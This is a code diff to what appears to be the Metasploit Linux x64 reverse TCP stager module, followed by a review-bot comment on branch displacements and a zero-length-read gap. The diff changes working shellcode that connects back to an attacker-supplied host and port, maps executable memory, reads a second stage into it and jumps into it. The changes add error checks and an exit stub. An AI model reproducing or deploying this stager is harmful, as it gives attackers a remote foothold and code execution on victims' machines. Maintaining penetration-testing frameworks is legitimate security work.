diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
index f398543e27..5be3330990 100644
--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -17,7 +17,7 @@ module MetasploitModule
 super(merge_info(info,
 'Name' => 'Reverse TCP Stager',
 'Description' => 'Connect back to the attacker',
- 'Author' => 'ricky',
+ 'Author' => ['ricky', 'tkmru'],
 'License' => MSF_LICENSE,
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
@@ -26,8 +26,8 @@ module MetasploitModule
 {
 'Offsets' =>
 {
- 'LHOST' => [ 45, 'ADDR' ],
- 'LPORT' => [ 43, 'n' ],
+ 'LHOST' => [ 55, 'ADDR' ],
+ 'LPORT' => [ 53, 'n' ],
 },
 'Payload' =>
 "\x48\x31\xff" + # xor %rdi,%rdi
@@ -42,6 +42,8 @@ module MetasploitModule
 "\xb2\x07" + # mov $0x7,%dl
 "\x0f\x05" + # syscall
 # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+ "\x48\x85\xc0" + # test %rax,%rax
+ "\x78\x3c" + # js 40012c
 "\x56" + # push %rsi
 "\x50" + # push %rax
 "\x6a\x29" + # pushq $0x29
@@ -53,6 +55,8 @@ module MetasploitModule
 "\x5e" + # pop %rsi
 "\x0f\x05" + # syscall
 # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+ "\x48\x85\xc0" + # test %rax,%rax
+ "\x78\x29" + # js 40012c
 "\x48\x97" + # xchg %rax,%rdi
 "\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx
 "\x15\xb3" + # LPORT
@@ -65,12 +69,23 @@ module MetasploitModule
 "\x58" + # pop %rax
 "\x0f\x05" + # syscall
 # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+ "\x48\x85\xc0" + # test %rax,%rax
+ "\x78\x0c" + # js 40012c
 "\x59" + # pop %rcx
 "\x5e" + # pop %rsi
 "\x5a" + # pop %rdx
 "\x0f\x05" + # syscall
 # read(3, "", 4096)
- "\xff\xe6" # jmpq *%rsi
+ "\x48\x85\xc0" + # test %rax,%rax
+ "\x78\x02" + # js 40012c
+ "\xff\xe6" + # jmpq *%rsi
+ # 40012c :
+ "\x6a\x3c" + # pushq $0x3c
+ "\x58" + # pop %rax
+ "\x6a\x01" + # pushq $0x1
+ "\x5f" + # pop %rdi
+ "\x0f\x05" #syscall
+ # exit(1)
 }
 ))
 end
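Review bot: The four new branches are commented as `# js 40012c`, an absolute address copied from a disassembly of a test build, while the encoded operands (`\x3c`, `\x29`, `\x0c`, `\x02`) are rel8 displacements to the `exit(1)` stub that have to be recomputed — together with the `LHOST`/`LPORT` values in the `Offsets` hunk — whenever a byte is inserted or removed anywhere before the stub; the comments should state that coupling rather than the stale address. Suggested wording: replace `# 40012c :` with `# exit:` and each `# js 40012c` with `# js exit (rel8; recompute if any preceding byte changes)`. A second caveat worth a one-line comment after the last check: `test %rax,%rax` plus `js` rejects only a negative (-errno) return, so a zero-length `read` from a peer that closed the connection still falls through to `jmpq *%rsi` into the untouched mapping. The enclosing method's `def` line lies before the first hunk, so the Offsets/Payload hash structure cannot be fully checked from here.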